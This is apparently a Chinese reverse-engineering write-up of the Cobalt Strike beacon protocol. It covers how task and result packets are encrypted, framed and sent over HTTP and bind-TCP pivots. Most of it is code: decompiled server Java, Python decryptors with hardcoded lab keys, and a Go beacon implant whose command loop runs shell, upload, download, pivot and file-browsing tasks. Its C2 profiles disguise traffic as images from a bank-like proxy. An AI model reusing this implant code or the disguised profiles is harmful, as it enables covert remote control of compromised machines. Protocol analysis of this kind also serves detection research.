        Object var8 = null;        byte[] var17;        synchronized(this.mac) {            this.mac.init(var6);            var17 = this.mac.doFinal(var16); //hashmac        }
        ByteArrayOutputStream var9 = new ByteArrayOutputStream();        var9.write(var16);//写入加密后的task数据        var9.write(var17, 0, 16);//写入hashmac        byte[] var10 = var9.toByteArray();        return var10;    } catch (InvalidKeyException var13) {        MudgeSanity.logException("encrypt failure for: " + var1, var13, false);        CommonUtils.print_error_file("resources/crypto.txt");        MudgeSanity.debugJava();        SecretKey var4 = this.getKey(var1);        if (var4 != null) {            CommonUtils.print_info("Key's algorithm is: '" + var4.getAlgorithm() + "' ivspec is: " + this.ivspec);        }    } catch (Exception var14) {        MudgeSanity.logException("encrypt failure for: " + var1, var14, false);    }
    return new byte[0];}

然后是解析profile并添加prepend data和append data
public void transform(Profile var1, Response var2, SmartBuffer var3) {      Iterator var4 = this.tsteps.iterator();
      while(var4.hasNext()) {         Program.Statement var6 = (Program.Statement)var4.next();         String var5;         switch(var6.action) {         case 1:            var3.append(toBytes(var6.argument));//添加append data            break;         case 2:            var3.prepend(toBytes(var6.argument));//添加prepend data            break;         case 3:            var5 = Base64.encode(var3.getBytes());//base64编码数据            var3.clear();            var3.append(toBytes(var5));            break;         ...         }      }   }

1.2.2 task任务的数据格式

根据上述过程,我们可以分析出task任务数据格式如下:


注意:task_buffer中包含:4字节的cmdbuffer_lenght和实际的cmdbuffer数据

1.2.3 使用python脚本测试解包

这里我们先使用python脚本来验证,代码如下:
'''cobaltstrike任务解密'''import hmacimport binasciiimport base64import struct
import hexdumpfrom Crypto.Cipher import AES
def compare_mac(mac, mac_verif):    if mac == mac_verif:        return True    if len(mac) != len(mac_verif):        print        "invalid MAC size"        return False
    result = 0
    for x, y in zip(mac, mac_verif):        result |= x ^ y
    return result == 0

def decrypt(encrypted_data, iv_bytes, signature, shared_key, hmac_key):    if not compare_mac(hmac.new(hmac_key, encrypted_data, digestmod="sha256").digest()[0:16], signature):        print("message authentication failed")        return
    cypher = AES.new(shared_key, AES.MODE_CBC, iv_bytes)    data = cypher.decrypt(encrypted_data)    return data

def readInt(buf):    return struct.unpack('>L', buf[0:4])[0]
#接收到的任务数据encData="0k6lSpOcdzWFzgaXLVIG3KScxMndHJzDRt//TUIqQSgtJdnQHkbXaatrNiizJJrj+9e4q7iHpPnaxEFMfRFluw=="
if __name__ == "__main__":    #key源自Beacon_metadata_RSA_Decrypt.py    SHARED_KEY = binascii.unhexlify("d8cc0d420a3ed27ab0de5033842164b8")    HMAC_KEY = binascii.unhexlify("578764fb028cfac24798926181720bd6")
    enc_data = base64.b64decode(encData)    print("数据总长度:{}".format(len(enc_data)))    signature = enc_data[-16:]    encrypted_data = enc_data[:-16]
    iv_bytes = bytes("abcdefghijklmnop",'utf-8')
    dec = decrypt(encrypted_data,iv_bytes,signature,SHARED_KEY,HMAC_KEY)
    counter = readInt(dec)    print("时间戳:{}".format(counter))
    decrypted_length = readInt(dec[4:])    print("任务数据包长度:{}".format(decrypted_length))
    data = dec[8:len(dec)]    print("任务Data")    print(hexdump.hexdump(data))
    # 任务标志    Task_Sign=data[0:4]    print("Task_Sign:{}".format(Task_Sign))
    # 实际的任务数据长度    Task_file_len = int.from_bytes(data[4:8], byteorder='big', signed=False)    print("Task_file:{}".format(Task_file_len))
    with open('data.bin', 'wb') as f:        f.write(data[8:Task_file_len])
    print(hexdump.hexdump(data[Task_file_len:]))

我们在cs中向beacon发送任务:


然后在beacon的机器上抓包获得封包的task数据。


然后根据profile,删除prepend和append。
http-get {    set uri "/api/getid";    client {        header "Accept" "*/*";        metadata {            base64;            prepend "SESSIONID=";            header "Cookie";        }    }
    server {        header "Server" "Pingan Frontend Proxy";        header "x-pingan-id" "wwvdT1M01kspYwKlmJIe0delKPUqYiRw6VYJKw9kekjO01FMl2QIStx=";        header "X-Frame-Options" "SAMEORIGIN";        header "Content-Type" "image/png";        output {           # mask;            base64;            prepend ".PNG";            print;        }    }}

得到加密的task数据为:
o+oyO90IlE+K4pr0d8GbVLZMbra2I4Ty90OHrqeOE/+NXDqos8Wzp2f0Dp9TIrfS

然后使用python脚本解密。


如上可以看出taskType为:0x27,taskBuffer为空。

1.2.4 使用golang完成解包

在使用Go语言开发跨平台的beacon时,在beacon返回源数据之后,就会进入循环定时获取task任务的过程,如下:
ok := packet.FirstBlood()    if ok {        for {            time.Sleep(time.Duration(config.Sleep) * time.Millisecond)            respBytes := packet.PullCommand() //获取http get response数据            if respBytes != nil {                totalLen := len(respBytes)                //返回的数据必须要大于prepend+append的长度                if totalLen > config.GetAppend + config.GetPrepend {                    //respBytes := resp.Bytes()                    //删除prepend数据                    if config.GetPrepend !=0 {                        respBytes = respBytes[config.GetPrepend:]                    }                    //删除append数据                    if config.GetAppend !=0 {                        respBytes = respBytes[:len(respBytes) - config.GetAppend]                    }                    //decode base64                    decryptBytes, base64Err := base64.StdEncoding.DecodeString(string(respBytes))                    if base64Err != nil {                        fmt.Println("Exception: ",base64Err.Error())                        break                    }                    respBytes = decryptBytes
                    //去除HashMac                    restBytes := respBytes[:len(respBytes)-crypt.HmacHashLen]                    //aes解密                    decrypted,decryptErr := packet.DecryptPacket(restBytes)                      if decryptErr != nil {                        fmt.Println("Exception: ",decryptErr.Error())                        break                    }
                    //获取task数据的长度                    lenBytes := decrypted[4:8]                    packetLen := util.ReadInt(lenBytes)                    //获取task数据                    decryptedBuf := bytes.NewBuffer(decrypted[8:])                    for {                        if packetLen <= 0 {                            break                        }                        //解析task数据                        cmdType, cmdBuf, parseErr := packet.ParsePacket(decryptedBuf, &packetLen)                        //根据命令类型,执行相应操作                        ...                    }                }            }        }    }


1.3 Beacon返回的task任务数据


1.3.1 解析返回的task任务数据

beacon执行完任务之后,加密返回的数据解析过程如下:

1. decompiled_src/beacon/BeaconHTTP.java,解析http post包
public byte[] serve(String var1, String var2, Properties var3, Properties var4) {    try {        String var5 = "";        //获取远程地址        String var6 = ServerUtils.getRemoteAddress(BeaconHTTP.this.c2profile, var3);        //获取post数据        String var7 = BeaconHTTP.this.getPostedData(var4);        //根据profile在post数据中获取beaconid        var5 = new String(BeaconHTTP.this.c2profile.recover(".http-post.client.id", var3, var4, var7, var1));        if (var5.length() == 0) {            CommonUtils.print_error("HTTP " + var2 + " to " + var1 + " from " + var6 + " has no session ID! This could be an error (or mid-engagement change) in your c2 profile");            MudgeSanity.debugRequest(".http-post.client.id", var3, var4, var7, var1, var6);        } else {            //根据profile在post数据中获取post data            byte[] var8 = CommonUtils.toBytes(BeaconHTTP.this.c2profile.recover(".http-post.client.output", var3, var4, var7, var1));            //var5 beaconid            //var8 post data            if (var8.length == 0 || !BeaconHTTP.this.controller.process_beacon_data(var5, var8)) {                MudgeSanity.debugRequest(".http-post.client.output", var3, var4, var7, var1, var6);            }        }    } catch (Exception var9) {        MudgeSanity.logException("beacon post handler", var9, false);    }
    return new byte[0];}

2. src/beacon/BeaconC2.java,检验数据包的长度并提取
public boolean process_beacon_data(String var1, byte[] var2) {      try {         DataInputStream var3 = new DataInputStream(new ByteArrayInputStream(var2));
         while(var3.available() > 0) {            //4 response长度            int var4 = var3.readInt(); //5904             //检验数据包长度            if (var4 > var3.available()) {               CommonUtils.print_error("Beacon " + var1 + " response length " + var4 + " exceeds " + var3.available() + " available bytes. [Received " + var2.length + " bytes]");               return false;            }
            if (var4 <= 0) {               CommonUtils.print_error("Beacon " + var1 + " response length " + var4 + " is invalid. [Received " + var2.length + " bytes]");               return false;            }
            byte[] var5 = new byte[var4];            var3.read(var5, 0, var4);
            //var1 beaconid            //var5 response数据            this.process_beacon_callback(var1, var5);         }
         var3.close();         return true;      } catch (Exception var6) {         MudgeSanity.logException("process_beacon_data: " + var1, var6, false);         return false;      }   }

3. src/beacon/BeaconC2.java,解密数据包
//解密beacon返回的数据,并将解密的数据传给主处理函数//beaconid//返回的aes加密后的数据(加密数据(counter+结果数据长度+结果数据)+16字节的hashmac)public void process_beacon_callback(String var1, byte[] var2) {    byte[] var3 = this.getSymmetricCrypto().decrypt(var1, var2);    this.process_beacon_callback_decrypted(var1, var3);}

src/dns/BaseSecurity.java
//beacon返回的任务数据解密函数//var2 = aes加密的数据(counter+命令结果的长度+命令结果(命令类型+执行结果))+hashmacpublic byte[] decrypt(String var1, byte[] var2) {    try {        if (!this.isReady(var1)) {            CommonUtils.print_error("decrypt: No session for '" + var1 + "'");            return new byte[0];        } else {            Session var3 = this.getSession(var1);            SecretKey var4 = this.getKey(var1); //获取当前beacon的aeskey            SecretKey var5 = this.getHashKey(var1); //获取当前beacon对应的HashMac            byte[] var6 = Arrays.copyOfRange(var2, 0, var2.length - 16); //task任务返回的加密数据            byte[] var7 = Arrays.copyOfRange(var2, var2.length - 16, var2.length); //最后16字节是task任务返回的hashmac            Object var8 = null;            byte[] var18;            synchronized(this.mac) {                this.mac.init(var5);                var18 = this.mac.doFinal(var6);            }
            byte[] var9 = Arrays.copyOfRange(var18, 0, 16);            //对比当前beacon存储的hashmac和task任务返回的hashmac            if (!MessageDigest.isEqual(var7, var9)) {                CommonUtils.print_error("[Session Security] Bad HMAC on " + var2.length + " byte message from Beacon " + var1);                return new byte[0];            } else {                Object var10 = null;                byte[] var19;                synchronized(this.out) {                    var19 = this.do_decrypt(var4, var6); //aes解密task任务返回的数据                }
                DataInputStream var11 = new DataInputStream(new ByteArrayInputStream(var19));                int var12 = var11.readInt();//counter                int var13 = var11.readInt();//命令结果数据的长度                if (var13 >= 0 && var13 <= var2.length) {                    byte[] var14 = new byte[var13];                    var11.readFully(var14, 0, var13); //从var11中读取var13长度的字节,放入进var14                    var3.counter = (long)var12;                    return var14; //返回任务结果类型+执行结果数据                } else {                    CommonUtils.print_error("[Session Security] Impossible message length: " + var13 + " from Beacon " + var1);                    return new byte[0];                }            }        }    } catch (Exception var17) {        var17.printStackTrace();        return new byte[0];    }}

4. src/beacon/BeaconC2.java,解析执行结果数据
public void process_beacon_callback_decrypted(String var1, byte[] var2) {      byte var3 = -1;      if (var2.length != 0) {         BeaconEntry var4 = this.getCheckinListener().resolve(var1 + "");         if (var4 == null) {            CommonUtils.print_error("entry is null for " + var1);         }
         try {            DataInputStream var5 = new DataInputStream(new ByteArrayInputStream(var2));            //4 获取任务返回类型            int taskType = var5.readInt();            String var6;
            //根据不同的返回结果执行相应的操作            ...            ...

         } catch (IOException var13) {            MudgeSanity.logException("beacon callback: " + var3, var13, false);         }
      }   }

1.3.2 task任务返回数据的格式

根据上述解析过程,我们可以获取task任务返回的数据包的格式如下:


1.3.3 使用python解析task任务返回的数据
'''Beacon任务执行结果解密'''import hmacimport binasciiimport base64import structimport hexdumpfrom Crypto.Cipher import AES
def compare_mac(mac, mac_verif):    if mac == mac_verif:        return True    if len(mac) != len(mac_verif):        print        "invalid MAC size"        return False
    result = 0
    for x, y in zip(mac, mac_verif):        result |= x ^ y
    return result == 0
def HexToByte( hexStr ):    return bytes.fromhex(hexStr)
def decrypt(encrypted_data, iv_bytes, signature, shared_key, hmac_key):    if not compare_mac(hmac.new(hmac_key, encrypted_data, digestmod="sha256").digest()[0:16], signature):        print("message authentication failed")        return
    cypher = AES.new(shared_key, AES.MODE_CBC, iv_bytes)    data = cypher.decrypt(encrypted_data)    return data
#key源自Beacon_metadata_RSA_Decrypt.pySHARED_KEY = binascii.unhexlify("7f13e5bcc4c6c5c7af06dc3143b0b88e")HMAC_KEY = binascii.unhexlify("b1179c03ea6cd3d4eb5054fa75332b0c")
encrypt_data=base64.b64decode("AAAAQPmxmlOwWb3bsWCXfcZJL5HJqg3HfMKEVuoGvTGOGB1Imr8hvN3n01GWoneTc3pm0tLFrWZC7QGoGvp7JfZOa1o=")#encrypt_data = HexToByte("0000075")encrypt_data_length=encrypt_data[0:4]
encrypt_data_length=int.from_bytes(encrypt_data_length, byteorder='big', signed=False)
encrypt_data_l = encrypt_data[4:len(encrypt_data)]
data1=encrypt_data_l[0:encrypt_data_length-16]signature=encrypt_data_l[encrypt_data_length-16:encrypt_data_length]iv_bytes = bytes("abcdefghijklmnop",'utf-8')
dec=decrypt(data1,iv_bytes,signature,SHARED_KEY,HMAC_KEY)

counter = dec[0:4]counter=int.from_bytes(counter, byteorder='big', signed=False)print("counter:{}".format(counter))
dec_length = dec[4:8]dec_length=int.from_bytes(dec_length, byteorder='big', signed=False)print("任务返回长度:{}".format(dec_length))
de_data= dec[8:len(dec)]Task_type=de_data[0:4]Task_type=int.from_bytes(Task_type, byteorder='big', signed=False)print("任务输出类型:{}".format(Task_type))
print(binascii.b2a_hex(de_data[4:dec_length]))
print(hexdump.hexdump(dec))

使用上面测试task任务下发解包的过程一样,我们使用cs下发任务


在beacon所在的机器上抓包


然后根据profile,去除http post数据中的prepend和append数据
http-post {    set uri "/api/postid";    client {        header "Accept" "*/*";        header "Content-Type" "image/png";
        id {            base64;            prepend "JSESSION=";            header "Cookie";        }        parameter "s" "1124";        parameter "d_referer" "http%3A%2F%2Fbank.pingan.com";
        output {            base64;            prepend ".PNG";            print;        }    }
    server {        header "Server" "Pingan Frontend Proxy";        header "x-pingan-id" "9zHYZzF8IlH7emm3GNdwPHVCnAo1gOxmo73O9JlwMsuP68pMKrSy17kS=";        header "X-Frame-Options" "SAMEORIGIN";
        output {            base64;            print;        }    }}

得到实际的post data
AAAAMOoMW516MwI6+UQGIx5LuEleeFVzVueZ10pEkAOLNHV3HUByBodgsliVpwUoEH1VgA== 

然后使用python脚本解析返回的数据


1.3.4 使用golang封包task返回的任务数据

以执行pwd为例:

func PWD(){    var finalPacket []byte = nil    pwd, err := os.Getwd()    result, err := filepath.Abs(pwd)    if err != nil {        finalPacket = packet.MakePacket(13,[]byte(err.Error()))    }else {        finalPacket = packet.MakePacket(19,[]byte(result))    }    packet.PushResult(finalPacket)}

1. MakePacket封装send data
func MakePacket(replyType int, b []byte) []byte {    config.Counter += 1    buf := new(bytes.Buffer)    counterBytes := make([]byte, 4)    binary.BigEndian.PutUint32(counterBytes, uint32(config.Counter))    buf.Write(counterBytes)
    if b != nil {        resultLenBytes := make([]byte, 4)        resultLen := len(b) + 4        binary.BigEndian.PutUint32(resultLenBytes, uint32(resultLen))        buf.Write(resultLenBytes)    }
    replyTypeBytes := make([]byte, 4)    binary.BigEndian.PutUint32(replyTypeBytes, uint32(replyType))    buf.Write(replyTypeBytes)
    buf.Write(b)
    encrypted, err := crypt.AesCBCEncrypt(buf.Bytes(), config.AesKey)    if err != nil {        return nil    }    // cut the zero because Golang's AES encrypt func will padding IV(block size in this situation is 16 bytes) before the cipher    encrypted = encrypted[16:]
    buf.Reset()
    sendLen := len(encrypted) + crypt.HmacHashLen    sendLenBytes := make([]byte, 4)    binary.BigEndian.PutUint32(sendLenBytes, uint32(sendLen))    buf.Write(sendLenBytes)
    buf.Write(encrypted)
    hmacHashBytes := crypt.HmacHash(encrypted)    buf.Write(hmacHashBytes)
    return buf.Bytes()}

2. PushResult封装http post
func HttpPost(url string, data []byte) error {    httpRequest := req.New()    postString := base64.StdEncoding.EncodeToString(data)
    for k,v := range config.Postheader{        if strings.Contains(v,"%ENCBEACONID%"){            config.Postheader[k] = strings.Replace(v, "%ENCBEACONID%", base64.StdEncoding.EncodeToString([]byte(strconv.Itoa(config.ClientID))), -1 )        }    }
    if len(config.PostPrepend) !=0 {        postString = config.PostPrepend + postString    }    if len(config.PostAppend) !=0 {        postString = postString + config.PostAppend    }    resp, err := httpRequest.Post(url, postString, config.Postheader)    if err != nil {        fmt.Printf("[-] Post http data error: %s\n", err.Error())        return err    }
    defer resp.Response().Body.Close()    if resp.Response().StatusCode != http.StatusOK {        fmt.Printf("[-] Post http response status code: %d\n", resp.Response().StatusCode)        return err    }    return nil}

0x02 跨平台http/https Beacon


根据上面我们对cs的http/https beacon的整个通信过程的研究,完全能自己编写一个跨平台的beacon,这里我们选择了golang作为开发语言,虽然编译之后很大,但是跨平台的性很好。


但是我们想将Beacon的回连地址、加密的公钥以及profile的配置都编译到golang程序中,这样的话每次生成跨平台Beacon的时候都需要修改源代码然后再编译,所以我们在golang源码外层再进行了一次python封装,它的作用如下:


1. 解析profile,并将相应的值填入golang源码中。

2. 根据.cobaltstrike.beacon_keys计算公钥,并填入golang源代码中。

3. 实现golang项目的交叉编译。具体的流程图设计如下:


实现的部分代码如下:

func main() {    //初始化,包括:生成随机的beaconid、生成随机的global key(aes+hashmac)、创建get和post的url以及对应的header    config.InitC2Profile()    //组装和封装源数据,并循环向ts发送,直到成功    ok := packet.FirstBlood()    if ok {        for {            time.Sleep(time.Duration(config.Sleep) * time.Millisecond)//sleep时间            //获取命令数据            respBytes := packet.PullCommand()            if respBytes != nil {                totalLen := len(respBytes)                if totalLen > config.GetAppend + config.GetPrepend {                    //删除prepend                    if config.GetPrepend !=0 {                        respBytes = respBytes[config.GetPrepend:]                    }                    //删除append                    if config.GetAppend !=0 {                        respBytes = respBytes[:len(respBytes) - config.GetAppend]                    }                    //decode base64                    decryptBytes, base64Err := base64.StdEncoding.DecodeString(string(respBytes))                    if base64Err != nil {                        fmt.Println("Exception: ",base64Err.Error())                        continue                    }                    respBytes = decryptBytes
                    //去除HashMac                    restBytes := respBytes[:len(respBytes)-crypt.HmacHashLen]                    //aes解密                    decrypted,decryptErr := packet.DecryptPacket(restBytes)                      if decryptErr != nil {                        fmt.Println("Exception: ",decryptErr.Error())                        continue                    }
                    //读取命令数据                    lenBytes := decrypted[4:8]                    packetLen := util.ReadInt(lenBytes)                    decryptedBuf := bytes.NewBuffer(decrypted[8:])                    for {                        if packetLen <= 0 {                            break                        }                        //解析命令数据                        cmdType, cmdBuf, parseErr := packet.ParsePacket(decryptedBuf, &packetLen)                        if parseErr == nil{                            if cmdBuf != nil {                                var finalPacket []byte = nil                                //执行对应的命令                                switch cmdType {                                case config.CMD_TYPE_SHELL:                                    go command.Shell(cmdBuf)
                                case config.CMD_TYPE_UPLOAD_START: //10                                    go command.Upload(cmdBuf)
                                case config.CMD_TYPE_UPLOAD_LOOP: //67                                    go command.Upload(cmdBuf)
                                case config.CMD_TYPE_DOWNLOAD: //11                                    go command.Download(cmdBuf)
                                case config.CMD_TYPE_CD: //5                                    go command.CD(cmdBuf)
                                case config.CMD_TYPE_SLEEP: //4                                    sleep := util.ReadInt(cmdBuf[:4])                                    config.Sleep = int(sleep)
                                case config.CMD_TYPE_PWD: //39                                    go command.PWD()
                                case config.CMD_TYPE_EXIT:                                    go command.Exit()
                                case config.CMD_TYPE_PORTFWD:                                    finalPacket = packet.MakePacket(13,[]byte("Please use shell rportfwd command"))                                    packet.PushResult(finalPacket)
                                case config.CMD_TYPE_PORTFWD_STOP:                                    finalPacket = packet.MakePacket(13,[]byte("Please use shell rportfwd command"))                                    packet.PushResult(finalPacket)
                                case config.CMD_TYPE_CONNECT:                                    go command.Connect(cmdBuf)
                                case config.CMD_TYPE_CONNECT_LIVE:                                    go command.BeaconLive(cmdBuf)
                                case config.CMD_TYPE_UNLINK:                                    go command.Unlink(cmdBuf)
                                case config.CMD_TYPE_FILE_Browser:                                    go command.FileBrowser(cmdBuf)
                                default:                                    finalPacket = packet.MakePacket(13, []byte("Command not supported"))                                    packet.PushResult(finalPacket)                                }                            }                        }                    }                }            }        }    }}


0x03 Bind tcp Beacon通信过程


了解了cs回连的http/https beacon的回连以及控制过程,我们再来看内网横向的Bind tcp beacon。


3.1 解析bindtcp源数据


任务返回类型为10的时候,表示返回的是connect的结果,解析代码在beacon/BeaconC2.java中。


这里调用的process_beacon_metadata函数解析源数据,和http/https beacon解析源数据的过程一样。所以我们可以知道bindtcp beacon 上线包的格式如下:

if (taskType == 10) { //beacon返回connect结果    childBeaconID = var5.readInt(); //子beacon id    var18 = var5.readInt(); //hint信息    rsaEncryptData = CommonUtils.bString(CommonUtils.readAll(var5)); //子beacon返回的rsa加密的源数据    BeaconEntry var9 = this.getCheckinListener().resolve(var1 + "");    //null    //父beacon的内网ip    //子beacon返回的rsa加密的源数据    //父beaconid    //hint    var10 = this.process_beacon_metadata((ScListener)null, var9.getInternal() + " ⚯⚯", CommonUtils.toBytes(rsaEncryptData), var1, var18);
    //成功连接到横向bind beacon    if (var10 != null) {        this.pipes.register(var1 + "", childBeaconID + "");        if (var10.getInternal() == null) {            this.getCheckinListener().output(BeaconOutput.Output(var1, "established link to child " + CommonUtils.session(childBeaconID)));            this.getResources().archive(BeaconOutput.Activity(var1, "established link to child " + CommonUtils.session(childBeaconID)));        } else {            this.getCheckinListener().output(BeaconOutput.Output(var1, "established link to child " + CommonUtils.session(childBeaconID) + ": " + var10.getInternal()));            this.getResources().archive(BeaconOutput.Activity(var1, "established link to child " + CommonUtils.session(childBeaconID) + ": " + var10.getComputer()));        }
        this.getCheckinListener().output(BeaconOutput.Output(var10.getId(), "established link to parent " + CommonUtils.session(var1) + ": " + var9.getInternal()));        this.getResources().archive(BeaconOutput.Activity(var10.getId(), "established link to parent " + CommonUtils.session(var1) + ": " + var9.getComputer()));    }}



3.1.1 验证解析数据


这里我们采用抓包一个http beacon和一个bindtcp beacon连接上线的方式,进行抓包验证。


http beacon:172.16.247.2,bindtcp beacon:172.16.247.10



1. 获取bindtcp beacon的源数据



其中id为10进制的beaconid:1919872472,对应的16进制为:726EEDD8。


2. 我们在http beacon上抓取172.16.247.10到172.16.247.2的数据包,可以成功抓到bindtcp beacon 的上线源数据包,如下:


d8ed6e72 16260b3d109719765a05bb700c998d6ca7578735042f3de458170fc22ebc681450cd06c82abb35fa4d11bef0b4d19d7d1c2018b1b6fccf9b35f47b751cbebfa903bb9f28de526fcf8d26b2f6def6952a0aab74970bfee5934cce36352be4111850856dee7e55df4ab04ab5e5bc8ed2991d3a7e477ad276b31a0373fbebe2e557


长度为132,即4字节的小端的beaconid+128字节的rsa加密的源数据。但是我们上面分析的bindtcp beacon中间还有一个hint值呢?


2.抓取172.16.247.2到ts的connect任务结果包


我们解密这个任务包获得子beacon对应的上线源数据包,然后查看二者差异。



3. 使用http/https beacon的aes和hashmac解密这个数据(记得去除prepend和append)



726eedd8 0010115c 16260b3d109719765a05bb700c998d6ca7578735042f3de458170fc22ebc681450cd06c82abb35fa4d11bef0b4d19d7d1c2018b1b6fccf9b35f47b751cbebfa903bb9f28de526fcf8d26b2f6def6952a0aab74970bfee5934cce36352be4111850856dee7e55df4ab04ab5e5bc8ed2991d3a7e477ad276b31a0373fbebe2e557


这里我们通过对比两个包,发现父beacon的connect会对子beacon返回的数据做一些操作,包括:

  • 小端beacon id变为大端beacon id

  • 在beacon id和rsa加密源数据之间插入4字节的hint值


4. 使用上面解析源数据的python脚本,解析上线的源数据



3.1.2 golang模拟connect命令封包


我们使用golang模拟这个过程:

//绑定子beaconid和对应tcp socket的关系//fmt.Println("[+] Connect recv: ",fmt.Sprintf("%x",data))clientIDBytes := data[:4]childBID := util.BytesToUint32(clientIDBytes)//fmt.Println("[+] Child beacon id: ",fmt.Sprintf("%x",childBID))config.Connects.Store(childBID, config.ChildBeacon{Server: server, ChildConn: childConn})
//插入hint值hint := 65536^uint32(port)hintBytes := make([]byte,4)binary.BigEndian.PutUint32(hintBytes,uint32(hint));
//小端beaconid变大端beaconidAddBytes := make([]byte, 4)binary.BigEndian.PutUint32(AddBytes,childBID)
endData := util.BytesCombine(AddBytes,hintBytes,data[4:])//fmt.Println("[+] Send up: ",fmt.Sprintf("%x",endData))


3.1.3 关于hint


这里我们父beacon为什么需要向收到的子beacon的数据中插入这个hint,它又是如何生成的呢?


在common/PivotHint.java中,我们可以看到对hint这个值的应用:

public class PivotHint {    public static final long HINT_REVERSE = 65536L;    public static final long HINT_FORWARD = 0L;    public static final long HINT_PROTO_PIPE = 0L;    public static final long HINT_PROTO_TCP = 1048576L;    protected int hint;
    public PivotHint(int var1) {        this.hint = var1;    }
    public PivotHint(String var1) {        this.hint = CommonUtils.toNumber(var1, 0);    }
    public int getPort() {        return this.hint & '\uffff'; //hint值的后4位表示一个端口    }
    public boolean isReverse() {        return ((long)this.hint & 65536L) == 65536L;//hint值的第4位的最后一个bit用来判断回连和转发    }
    public boolean isForward() {        return !this.isReverse();    }
    public boolean isTCP() {        return ((long)this.hint & 1048576L) == 1048576L;//hint值的第3位的最后一个bit用来判断tcp还是smb    }
    public String getProtocol() {        return this.isTCP() ? "TCP" : "SMB";    }
    public String toString() {        return this.isForward() ? this.getPort() + ", " + this.getProtocol() + " (FWD)" : this.getPort() + ", " + this.getProtocol() + " (RVR)";    }}


我们来解析上面实验的hint值:0010115c



hint的第3位的最后一个bit为1,表示它是一个tcp的数据包。



最后4位对应的port值为:4444,为子beacon对应的监听端口。


3.2 解析bindtcp task返回数据


通过http/https beacon的分析我们知道process_beacon_data函数是处理task返回数据的函数,其中我 们在这个函数中还找到它对自己的递归调用,如下:

if (taskType == 12) { //子beacon返回信息    childBeaconID = var5.readInt();//beaconid    childBeaconData = CommonUtils.readAll(var5); //task返回数据(len+aes加密后的数据)    if (childBeaconData.length > 0) {        this.process_beacon_data(childBeaconID + "", childBeaconData);    }
    this.getCheckinListener().update(childBeaconID + "", System.currentTimeMillis(), (String)null, false);}


由上我们bindtcp beacon返回的任务数据的格式为:



3.2.1 验证解析数据


1. 在172.16.247.10上执行cs命令



2. 在172.16.247.2上抓172.16.247.10到172.16.247.2的包



如图,我们可以看到172.16.247.10发送给172.16.247.2的一次task任务的数据包是3个。第一个包的数据:



表示任务返回数据的长度,这里是0x0714,10进制为:1812


第二个包和第三个包是任务返回数据:


1460+352 = 1812,刚好是第一个包的数据。实际任务返回数据就是将两个包连接:

000007101c430e118c822ec0aac3857c0d08b9d64d34905d76ea850a85f5ee2496cc0e2c4675fb2e 2c18562cc0422034f28221e0a45d6ecb3cb55e347ca9743cf4766f58ddfea7a82edc0e41ae5e5382 5d9552a4acd009c2210d6db1baf999421b69c1e69986213cf2fbbb4b0202a8d59ccfe07814415e07 66ec8b33e2839f1284ee956a5ad2c24eb07d9c7d82737ea5dcc0bdbd0222100e82a09bf3ad46ad96 d200cda2b017d779070022a21bc09c9970d9af538a68bd88f08391a8d4027a9bbddcfe9f451f643e a3e302549792137a1e9a7c7ded5303210fe0271710e4d5a857662f0ce250d34e4e329b83c7d5d558 0ed33dd73cc39811d26e24e4757744dd1efcdf3da4a23008a5067ee60179496cd62b5977ac487af4 fac686714605e00e66e3db292dd9a46246e765c8cb0037d39fa4f0bdb0de97bd3bad42f10e2e4b6e ce0cf07d56c15a51b592c3c0d57e33a215ebfe2cf43999f01aab0e965059eb54fc872d1f2696c992 6446ad09fb1db8b3eae8a9d1a6ca700033eae1c1d79a21beb38276ceb669b8a3a63015861d43acbe e918c321f60ed2e659350db48f13998609cbd66970ae15dda6c245e122484353907462ab50723064 4550f0b8cbec1727cd7340e85c037c8dd02a51c09df80fabc31502841c08648da74095388b6aefa3 8407777048d9c3fafa81da8493795d32efe911439085c0462e835848a170f619d4d12a335735c0fc 348df9ef65a3c6ec27b7b374446656dc15802fe22e5668314fe19147ace8508fff999fb9d1b2cf42 0dbf75936989dc7beb19daddb8279e567f207550c379db2ec243aa9447f5ce13a97b9d3b21259714 2c3e5135b0e0a875b328f75b062e7ea16e80727853c35c4a51d2322fb5d9f7c0bc5bdd1c13d14e43 f59828ac7a27ae597822de379b75d424b3809c5cff021a452685d3735016b82e6c1946da53fdc445 5ac92b0eb33f1b6ce8eca73a4c029b81674006c317bde4e44e0f233be4d6bb57453b56e94af95d73 408267949b5a6ce91746435b4bfd4eeb8c7fc7451421eb3a8b2e38b07f13a6863988af60b9e6d8f6 8ffafa0ae3e44b20ac52b5bb2d5ecbbbaf34e823dbc5ff1f5d7e93f631a065af90e5e6d4ff135d74 31153c0e62f5947b0a163e50b718e28a09304b49f0d41afdf34cf1e2c9093f28797306fe47210b7b afd377afb76f9b39c24327347af88788fb753f8161f514e47a46c2cf4b4da00547f9b892b124553a 7fa5b39a99bd75e1d77f5d07d9cddfbe722e99e5ceb33cc773ffadb51cdaf0bb21d998d4a1b318f8 70ab2dd5e704bf24aa09902b2844624256b3ed5c3af6b054c44dc9d356bea01211b11b500cae765c 1b1ff47ea6cf5652ba042d778ab6941c0afbf03f7609e9ea2235f2cfd3858f2da48282affe375876 bea69c465eddf3682b19c843c4243a132480ea6f1c46d906ac26987290bfb5b35e2f42d64be46c79 fd7b2bd22ab1a62a973a4ece0d55a5fc562700dc8f6a139cf56d3bba68a1a66c25fd5b8746639d08 d3b99cfec117db3a3c7e4ea5b1aa86547f6ddae2e6ec0bc14be6abfdf2dc5862d45a2b315b26a108 fbcbb36080fe7ad1b854d81d8532602596f83aae6b328e20ea87e1d4f0647b7c76004f07fc8135fa 9b11482f3b7a85a90c9f6e91e08f086661e9140427ce546075f9e226980b8bb2465c45bbaf9a7976 2dc9de96a33e8cc1512dbfd2bbbfed7418fd9d679948092047466b60bf76d84b6c1bc2a4ef79ec42 82ad5448848bf8a4bb1df9f7bd5688ec89804cfceb450f6696964906d69e62c6310dbd8878b4064a 68bede64051f41dd427d784cd596cb36b921561fe75e6f8c43920481dd756914af1cafa79ee34bf8 448a5ab89e3a4de3665045267c4e48da07f677efe2e8a0b036d09524ecb91e7c4720bfac87099c85 1e1d23fa4fc446721e0905209982d9a2ddc40a5233e2d04317d9ceba6a09779d9e944fb5ca1ec237 9a68d1ddcdba7e31c40877cec68a5acdde9fafb57e84e6640f404acabd6e39f779c69e321718631d af8cc5dd76d79cf858deac780e8ac5637bac95ee84c6137f667a8807fe52add083203cc00cb9c112 bb839738df241e244ffe600ad3eff58f04eefdaae71faacca20e1d12f9f18e2e1250201f62918968 d615cff69db01d57007d6267d44e193e3189a761f396bbe487f941b26ac1836d85c4c2a02d094367 16011a6e4a0201b34a816a5469449049966a425ce3226d2fa90669a6305a0c5dbb0cc85688365bbf 